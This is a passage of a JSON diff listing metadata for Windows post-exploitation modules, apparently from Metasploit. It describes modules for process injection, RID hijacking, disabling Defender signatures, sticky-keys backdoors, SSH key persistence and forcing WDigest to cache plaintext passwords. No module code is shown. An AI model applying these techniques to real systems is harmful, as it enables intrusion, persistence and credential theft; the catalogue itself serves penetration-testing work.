"config-changes" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/portproxy": { + "name": "Windows Manage Set Port Forwarding With PortProxy", + "fullname": "post/windows/manage/portproxy", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module uses the PortProxy interface from netsh to set up\n port forwarding persistently (even after reboot). 
PortProxy\n supports TCP IPv4 and IPv6 connections.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/portproxy.rb", + "is_install_path": true, + "ref_name": "windows/manage/portproxy", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/powershell/build_net_code": { + "name": "Powershell .NET Compiler", + "fullname": "post/windows/manage/powershell/build_net_code", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-08-14", + "type": "post", + "author": [ + "RageLtMan " + ], + "description": "This module will build a .NET source file using powershell. The compiler builds\n the executable or library in memory and produces a binary. After compilation the\n PowerShell session can also sign the executable if provided a path the\n a .pfx formatted certificate. 
Compiler options and a list of assemblies\n required can be configured in the datastore.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/powershell/build_net_code.rb", + "is_install_path": true, + "ref_name": "windows/manage/powershell/build_net_code", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/powershell/exec_powershell": { + "name": "Windows Manage PowerShell Download and/or Execute", + "fullname": "post/windows/manage/powershell/exec_powershell", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nicholas Nam (nick ", + "RageLtMan " + ], + "description": "This module will download and execute a PowerShell script over a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/powershell/exec_powershell.rb", + "is_install_path": true, + "ref_name": "windows/manage/powershell/exec_powershell", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/powershell/load_script": { + "name": "Load Scripts Into PowerShell 
Session", + "fullname": "post/windows/manage/powershell/load_script", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Turner benpturner ", + "Dave Hardy davehardy20 " + ], + "description": "This module will download and execute one or more PowerShell scripts\n over a present powershell session.\n Setting VERBOSE to true will show the stager results.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/powershell/load_script.rb", + "is_install_path": true, + "ref_name": "windows/manage/powershell/load_script", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/pptp_tunnel": { + "name": "Windows Manage Remote Point-to-Point Tunneling Protocol", + "fullname": "post/windows/manage/pptp_tunnel", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module initiates a PPTP connection to a remote machine (VPN server). Once\n the tunnel is created we can use it to force the victim traffic to go through the\n server getting a man in the middle attack. 
Be sure to allow forwarding and\n masquerading on the VPN server (mitm).", + "references": [ + "URL-https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/pptp_tunnel.rb", + "is_install_path": true, + "ref_name": "windows/manage/pptp_tunnel", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/priv_migrate": { + "name": "Windows Manage Privilege Based Process Migration ", + "fullname": "post/windows/manage/priv_migrate", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Josh Hale \"sn0wfa11\" ", + "theLightCosine " + ], + "description": "This module will migrate a Meterpreter session based on session privileges.\n It will do everything it can to migrate, including spawning a new User level process.\n For sessions with Admin rights: It will try to migrate into a System level process in the following\n order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe.\n If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights:\n It will try to migrate to a user level process, if that fails it will attempt to spawn the process\n then migrate to it. 
It will attempt the User level processes in the following order:\n NAME (if specified), explorer.exe, then notepad.exe.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/priv_migrate.rb", + "is_install_path": true, + "ref_name": "windows/manage/priv_migrate", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/pxeexploit": { + "name": "Windows Manage PXE Exploit Server", + "fullname": "post/windows/manage/pxeexploit", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "scriptjunkie" + ], + "description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing a payload to install metsvc, disable the\n firewall, and add a new user metasploit on any Windows partition seen,\n and add a uid 0 user with username and password metasploit to any linux\n partition seen. 
The windows user will have the password p@SSw0rd!123456\n (in case of complexity requirements) and will be added to the administrators\n group.\n\n See exploit/windows/misc/pxesploit for a version to deliver a specific payload.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/windows/manage/pxeexploit.rb", + "is_install_path": true, + "ref_name": "windows/manage/pxeexploit", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/reflective_dll_inject": { + "name": "Windows Manage Reflective DLL Injection Module", + "fullname": "post/windows/manage/reflective_dll_inject", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell ", + "b4rtik" + ], + "description": "This module will inject a specified reflective DLL into the memory of a\n process, new or existing. If arguments are specified, they are passed to\n the DllMain entry point as the lpvReserved (3rd) parameter. 
To read\n output from the injected process, set PID to zero and WAIT to non-zero.\n Make sure the architecture of the DLL matches the target process.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/reflective_dll_inject.rb", + "is_install_path": true, + "ref_name": "windows/manage/reflective_dll_inject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/remove_ca": { + "name": "Windows Manage Certificate Authority Removal", + "fullname": "post/windows/manage/remove_ca", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vt " + ], + "description": "This module removes the specified CA certificate from the\n system Trusted Root store.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/remove_ca.rb", + "is_install_path": true, + "ref_name": "windows/manage/remove_ca", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/remove_host": { + "name": "Windows Manage Host File Entry Removal", + "fullname": "post/windows/manage/remove_host", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + 
"author": [ + "vt " + ], + "description": "This module allows the attacker to remove an entry from the Windows hosts file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/remove_host.rb", + "is_install_path": true, + "ref_name": "windows/manage/remove_host", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/rid_hijack": { + "name": "Windows Manage RID Hijacking", + "fullname": "post/windows/manage/rid_hijack", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sebastian Castro " + ], + "description": "This module will create an entry on the target by modifying some properties\n of an existing account. 
It will change the account attributes by setting a\n Relative Identifier (RID), which should be owned by one existing\n account on the destination machine.\n\n Taking advantage of some Windows Local Users Management integrity issues,\n this module will allow to authenticate with one known account\n credentials (like GUEST account), and access with the privileges of another\n existing account (like ADMINISTRATOR account), even if the spoofed account is\n disabled.", + "references": [ + "URL-https://web.archive.org/web/20240520163742/https://csl.com.co/rid-hijacking/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/rid_hijack.rb", + "is_install_path": true, + "ref_name": "windows/manage/rid_hijack", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/rollback_defender_signatures": { + "name": "Disable Windows Defender Signatures", + "fullname": "post/windows/manage/rollback_defender_signatures", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "metasploit ", + "luisco100 " + ], + "description": "This module with appropriate rights uses the Windows Defender command-line utility to run an automation\n tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine.\n The tool is prominently used for scheduling scans and updating the signature or definition files,\n but there is a switch created to restore the installed signature definitions to a previous backup copy or\n to the original default set of signatures which is none, disabling all the signatures and allowing malware\n to execute even with the Windows Defender solution enabled.", + "references": [], + 
"platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/rollback_defender_signatures.rb", + "is_install_path": true, + "ref_name": "windows/manage/rollback_defender_signatures", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "Reliability": [], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ROLLBACK", + "description": "Rollback Defender signatures" + }, + { + "name": "UPDATE", + "description": "Update Defender signatures" + } + ] + }, + "post_windows/manage/rpcapd_start": { + "name": "Windows Manage Remote Packet Capture Service Starter", + "fullname": "post/windows/manage/rpcapd_start", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module enables the Remote Packet Capture System (rpcapd service)\n included in the default installation of Winpcap. 
The module allows you to set up\n the service in passive or active mode (useful if the client is behind a firewall).\n If authentication is enabled you need a local user account to capture traffic.\n PORT will be used depending of the mode configured.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/rpcapd_start.rb", + "is_install_path": true, + "ref_name": "windows/manage/rpcapd_start", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/run_as": { + "name": "Windows Manage Run Command As User", + "fullname": "post/windows/manage/run_as", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kx499" + ], + "description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default, by setting\n CMDOUT to true output will be redirected to a temp file and read back in to\n display. 
By setting advanced option SETPASS to true, it will reset the user's\n password and then execute the command.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/run_as.rb", + "is_install_path": true, + "ref_name": "windows/manage/run_as", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/run_as_psh": { + "name": "Windows 'Run As' Using PowerShell", + "fullname": "post/windows/manage/run_as_psh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "p3nt4" + ], + "description": "This module will start a process as another user using PowerShell.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/run_as_psh.rb", + "is_install_path": true, + "ref_name": "windows/manage/run_as_psh", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/sdel": { + "name": "Windows Manage Safe Delete", + "fullname": "post/windows/manage/sdel", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "The goal of the module is to hinder the recovery of deleted files by overwriting\n its contents. 
This could be useful when you need to download some file on the victim\n machine and then delete it without leaving clues about its contents. Note that the script\n does not wipe the free disk space so temporary/sparse/encrypted/compressed files could\n not be overwritten. Note too that MTF entries are not overwritten so very small files\n could stay resident within the stream descriptor.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/sdel.rb", + "is_install_path": true, + "ref_name": "windows/manage/sdel", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/shellcode_inject": { + "name": "Windows Manage Memory Shellcode Injection Module", + "fullname": "post/windows/manage/shellcode_inject", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "phra " + ], + "description": "This module will inject into the memory of a process a specified shellcode.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/shellcode_inject.rb", + "is_install_path": true, + "ref_name": "windows/manage/shellcode_inject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/sshkey_persistence": { + "name": "SSH Key Persistence", 
+ "fullname": "post/windows/manage/sshkey_persistence", + "aliases": [], + "rank": 400, + "disclosure_date": null, + "type": "post", + "author": [ + "Dean Welch " + ], + "description": "This module will add an SSH key to a specified user (or all), to allow\n remote login via SSH at any time.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/sshkey_persistence.rb", + "is_install_path": true, + "ref_name": "windows/manage/sshkey_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/sticky_keys": { + "name": "Sticky Keys Persistence Module", + "fullname": "post/windows/manage/sticky_keys", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "OJ Reeves" + ], + "description": "This module makes it possible to apply the 'sticky keys' hack to a session with appropriate\n rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\n login screen or via a UAC confirmation dialog. 
The module modifies the Debug registry setting\n for certain executables.\n\n The module options allow for this hack to be applied to:\n\n SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),\n UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\n OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and\n DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).\n\n The hack can be added using the ADD action, and removed with the REMOVE action.\n\n Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\n to the target prior to running the module. By default, a SYSTEM command prompt is installed\n using the registry method if this module is run without modifying any parameters.", + "references": [ + "URL-https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit", + "URL-https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/sticky_keys.rb", + "is_install_path": true, + "ref_name": "windows/manage/sticky_keys", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ADD", + "description": "Add the backdoor to the target." + }, + { + "name": "REMOVE", + "description": "Remove the backdoor from the target." 
+ } + ] + }, + "post_windows/manage/vmdk_mount": { + "name": "Windows Manage VMDK Mount Drive", + "fullname": "post/windows/manage/vmdk_mount", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage\n of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the\n device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with\n extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots\n or clones are linked from the file.", + "references": [ + "URL-http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/vmdk_mount.rb", + "is_install_path": true, + "ref_name": "windows/manage/vmdk_mount", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/vss": { + "name": "Windows Manage Volume Shadow Copies", + "fullname": "post/windows/manage/vss", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module will perform management actions for Volume Shadow Copies on the system. 
This is based on the VSSOwn\n Script originally posted by Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.", + "references": [ + "URL-https://web.archive.org/web/20201111212952/https://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-02-23 16:27:12 +0000", + "path": "/modules/post/windows/manage/vss.rb", + "is_install_path": true, + "ref_name": "windows/manage/vss", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "VSS_CREATE", + "description": "Create a new VSS copy" + }, + { + "name": "VSS_GET_INFO", + "description": "Get VSS information" + }, + { + "name": "VSS_LIST_COPIES", + "description": "List VSS copies" + }, + { + "name": "VSS_MOUNT", + "description": "Mount a VSS copy" + }, + { + "name": "VSS_SET_MAX_STORAGE_SIZE", + "description": "Set the VSS maximum storage size" + }, + { + "name": "VSS_UNMOUNT", + "description": "Unmount a VSS copy" + } + ] + }, + "post_windows/manage/wdigest_caching": { + "name": "Windows Post Manage WDigest Credential Caching", + "fullname": "post/windows/manage/wdigest_caching", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kostas Lintovois " + ], + "description": "On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. 
This module enables/disables\n credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key.\n Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/wdigest_caching.rb", + "is_install_path": true, + "ref_name": "windows/manage/wdigest_caching", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/webcam": { + "name": "Windows Manage Webcam", + "fullname": "post/windows/manage/webcam", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will allow the user to detect installed webcams (with\n the LIST action) or take a snapshot (with the SNAPSHOT) action.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/webcam.rb", + "is_install_path": true, + "ref_name": "windows/manage/webcam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LIST", + "description": "Show a list of webcams" + }, + { + "name": "SNAPSHOT", + "description": "Take a snapshot with the webcam" + } + ] + }, + 
"post_windows/recon/computer_browser_discovery": { + "name": "Windows Recon Computer Browser Discovery", + "fullname": "post/windows/recon/computer_browser_discovery", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module uses railgun to discover hostnames and IPs on the network.\n LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers),\n SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers),\n NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browsers),\n WINDOWS (all Windows hosts), or UNIX (all Unix hosts).", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/recon/computer_browser_discovery.rb", + "is_install_path": true, + "ref_name": "windows/recon/computer_browser_discovery", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/recon/outbound_ports": { + "name": "Windows Outbound-Filtering Rules", + "fullname": "post/windows/recon/outbound_ports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module makes some kind of TCP traceroute to get outbound-filtering rules.\n It will try to make a TCP connection to a certain public IP address (this IP\n does not need to be under your control) using different TTL incremental values.\n This way if you get an answer (ICMP TTL time exceeded packet) from a public IP\n device you can infer that the destination port is allowed. 
Setting STOP to\n true the module will stop as soon as you reach a public IP (this will generate\n less noise in the network).", + "references": [ + "URL-http://www.shelliscoming.com/2014/11/getting-outbound-filtering-rules-by.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/recon/outbound_ports.rb", + "is_install_path": true, + "ref_name": "windows/recon/outbound_ports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/wlan/wlan_bss_list": { + "name": "Windows Gather Wireless BSS Info", + "fullname": "post/windows/wlan/wlan_bss_list", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module gathers information about the wireless Basic Service Sets\n available to the victim machine.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/wlan/wlan_bss_list.rb", + "is_install_path": true, + "ref_name": "windows/wlan/wlan_bss_list", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/wlan/wlan_current_connection": { + "name": "Windows Gather Wireless Current Connection Info", + "fullname": "post/windows/wlan/wlan_current_connection", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": 
"post", + "author": [ + "theLightCosine " + ], + "description": "This module gathers information about the current connection on each\n wireless lan interface on the target machine.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/wlan/wlan_current_connection.rb", + "is_install_path": true, + "ref_name": "windows/wlan/wlan_current_connection", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/wlan/wlan_disconnect": { + "name": "Windows Disconnect Wireless Connection", + "fullname": "post/windows/wlan/wlan_disconnect", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module disconnects the current wireless network connection\n on the specified interface.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/wlan/wlan_disconnect.rb", + "is_install_path": true, + "ref_name": "windows/wlan/wlan_disconnect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/wlan/wlan_probe_request": { + "name": "Windows Send Probe Request Packets", + "fullname": "post/windows/wlan/wlan_probe_request", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja 
